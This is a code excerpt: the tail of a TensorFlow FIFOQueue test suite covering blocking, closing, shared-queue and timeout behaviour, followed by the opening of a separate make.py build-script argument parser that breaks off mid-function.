with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
self.assertAllEqual(elems[3:], self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
self.evaluate(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], self.evaluate(dequeued_t))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeued_t)
self.assertEqual(elems[3], self.evaluate(cleanup_dequeue_t))
def close():
self.evaluate(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, (dtypes_lib.float32, dtypes_lib.float32), (
(), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = self.evaluate([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
self.assertEqual([50.0], self.evaluate(dequeued_t))
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
time.sleep(0.01)
self.assertEqual([50.0], self.evaluate(dequeued_t))
self.assertEqual([60.0], self.evaluate(dequeued_t))
# Make sure the thread finishes before exiting.
thread.join()
def testBlockingEnqueueBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(1, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.FIFOQueue(
1, dtypes_lib.float32, shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = data_flow_ops.FIFOQueue(
1, dtypes_lib.float32, shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.FIFOQueue(15, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_f")
q_f_2 = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(data_flow_ops.FIFOQueue(10, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.FIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
q2 = data_flow_ops.FIFOQueue(15, dtypes_lib.float32)
enq_q = data_flow_ops.FIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.FIFOQueue(5, dtypes_lib.float32, ())
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = data_flow_ops.FIFOQueue(5, dtypes_lib.float32)
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(5, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(2, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
dtypes_lib.uint16, dtypes_lib.bool, dtypes_lib.complex64,
dtypes_lib.complex128
]
shape = (32, 4, 128)
q = data_flow_ops.FIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes_lib.bool:
np_array = np_array > 0
elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = self.evaluate(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testDequeueEnqueueFail(self):
with self.cached_session() as session:
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
a = q.dequeue()
b = control_flow_ops.Assert(False, ["Before enqueue"])
with ops.control_dependencies([b]):
c = q.enqueue(33)
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Before enqueue" in str(e)):
session.run([a, c])
class FIFOQueueDictTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
names=("i", "j"),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
self.assertEqual(["i", "j"], q.names)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
names=("i", "f"),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
self.assertEqual(["i", "f"], q.names)
def testEnqueueDequeueOneComponent(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=((),), names="f")
# Verify that enqueue() checks that when using names we must enqueue a
# dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue(10.0)
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue((10.0,))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"x": 12})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"f": 10.0, "s": "aa"})
enqueue_op = q.enqueue({"f": 10.0})
enqueue_op2 = q.enqueue({"f": 20.0})
enqueue_op3 = q.enqueue({"f": 30.0})
# Verify that enqueue_many() checks that when using names we must enqueue
# a dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op4 = q.enqueue_many([40.0, 50.0])
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"x": 12})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"f": [40.0, 50.0], "s": ["aa", "bb"]})
enqueue_op4 = q.enqueue_many({"f": [40.0, 50.0]})
dequeue = q.dequeue()
dequeue_2 = q.dequeue_many(2)
self.evaluate(enqueue_op)
self.evaluate(enqueue_op2)
self.evaluate(enqueue_op3)
self.evaluate(enqueue_op4)
f = sess.run(dequeue["f"])
self.assertEqual(10.0, f)
f = sess.run(dequeue_2["f"])
self.assertEqual([20.0, 30.0], list(f))
f = sess.run(dequeue_2["f"])
self.assertEqual([40.0, 50.0], list(f))
def testEnqueueDequeueMultipleComponent(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32, dtypes_lib.string),
shapes=((), (), ()),
names=("f", "i", "s"))
# Verify that enqueue() checks that when using names we must enqueue a
# dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue((10.0, 123, "aa"))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"x": 10.0})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"i": 12, "s": "aa"})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"i": 123, "s": "aa", "f": 10.0, "x": 10.0})
enqueue_op = q.enqueue({"i": 123, "s": "aa", "f": 10.0})
enqueue_op2 = q.enqueue({"i": 124, "s": "bb", "f": 20.0})
enqueue_op3 = q.enqueue({"i": 125, "s": "cc", "f": 30.0})
# Verify that enqueue_many() checks that when using names we must enqueue
# a dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op4 = q.enqueue_many(([40.0, 50.0], [126, 127], ["dd", "ee"]))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"x": [10.0, 20.0]})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"i": [12, 12], "s": ["aa", "bb"]})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({
"f": [40.0, 50.0],
"i": [126, 127],
"s": ["dd", "ee"],
"x": [1, 2]
})
enqueue_op4 = q.enqueue_many({
"f": [40.0, 50.0],
"i": [126, 127],
"s": ["dd", "ee"]
})
dequeue = q.dequeue()
dequeue_2 = q.dequeue_many(2)
self.evaluate(enqueue_op)
self.evaluate(enqueue_op2)
self.evaluate(enqueue_op3)
self.evaluate(enqueue_op4)
i, f, s = sess.run([dequeue["i"], dequeue["f"], dequeue["s"]])
self.assertEqual(123, i)
self.assertEqual(10.0, f)
self.assertEqual(compat.as_bytes("aa"), s)
i, f, s = sess.run([dequeue_2["i"], dequeue_2["f"], dequeue_2["s"]])
self.assertEqual([124, 125], list(i))
self.assertEqual([20.0, 30.0], list(f))
self.assertEqual([compat.as_bytes("bb"), compat.as_bytes("cc")], list(s))
i, f, s = sess.run([dequeue_2["i"], dequeue_2["f"], dequeue_2["s"]])
self.assertEqual([126, 127], list(i))
self.assertEqual([40.0, 50.0], list(f))
self.assertEqual([compat.as_bytes("dd"), compat.as_bytes("ee")], list(s))
class FIFOQueueWithTimeoutTest(test.TestCase):
def testDequeueWithTimeout(self):
with self.session(
config=config_pb2.ConfigProto(operation_timeout_in_ms=20)) as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual(
compat.as_bytes(""), q.queue_ref.op.get_attr("container"))
dequeued_t = q.dequeue()
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
self.evaluate(dequeued_t)
def testReusableAfterTimeout(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
dequeued_t = q.dequeue()
enqueue_op = q.enqueue(37)
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
sess.run(dequeued_t, options=config_pb2.RunOptions(timeout_in_ms=10))
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
sess.run(dequeued_t, options=config_pb2.RunOptions(timeout_in_ms=10))
self.evaluate(enqueue_op)
self.assertEqual(37, self.evaluate(dequeued_t))
class QueueContainerTest(test.TestCase):
def testContainer(self):
with ops.Graph().as_default():
with ops.container("test"):
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual(
compat.as_bytes("test"), q.queue_ref.op.get_attr("container"))
class FIFOQueueBenchmark(test.Benchmark):
"""Benchmark FIFOQueue operations."""
def _build_graph(self):
"""Builds a graph that enqueues and dequeues a single float.
Returns:
A tuple with the graph init tensor and graph output tensor.
"""
q = data_flow_ops.FIFOQueue(1, "float")
init = q.enqueue(1.0)
x = q.dequeue()
q_inc = q.enqueue(x + 1)
return init, q_inc
# TODO(suharshs): Add benchmarks for:
# - different capacities of the queue
# - various sizes of tensors
# - enqueue_many, dequeue_many
def _run(self, num_iters):
"""Benchmarks enqueueing and dequeueing from a FIFOQueue.
Args:
num_iters: The number of iterations to run.
Returns:
The duration of the run in seconds.
"""
graph = ops.Graph()
with graph.as_default():
init, output = self._build_graph()
with session_lib.Session(graph=graph) as session:
init.run()
_ = session.run(output) # warm up.
start_time = time.time()
for _ in range(num_iters):
_ = session.run(output)
duration = time.time() - start_time
print("%f secs per enqueue-dequeue" % (duration / num_iters))
self.report_benchmark(
name="fifo_queue", iters=num_iters, wall_time=duration / num_iters)
return duration
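# A hypothetical standalone driver for this benchmark (not part of the original
# file); test.Benchmark subclasses can generally be invoked directly like this:
#   FIFOQueueBenchmark()._run(2000)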
if __name__ == "__main__":
test.main()
|
make.py | # coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v5'
current_decomp_data = 'decomp_data_v7'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-clean_only', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
actions.add_argument('-bench', action='store_true')
actions.add_argument('-run_bench', action='store_true')
actions.add_argument('-pull_bench', action='store_true') # Android only
actions.add_argument('-convert', help='Input/Output directory to convert')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'clang10', 'clang11', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'gcc10', 'osx', 'ios', 'emscripten'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64', 'wasm'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
misc.add_argument('-num_threads', help='Number of threads to use while compiling and running regression tests')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads:
num_threads = 4
parser.set_defaults(build=False, clean=False, clean_only=False, unit_test=False, regression_test=False, bench=False, run_bench=False, pull_bench=False,
compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True,
num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'emscripten':
if not args.cpu:
args.cpu = 'wasm'
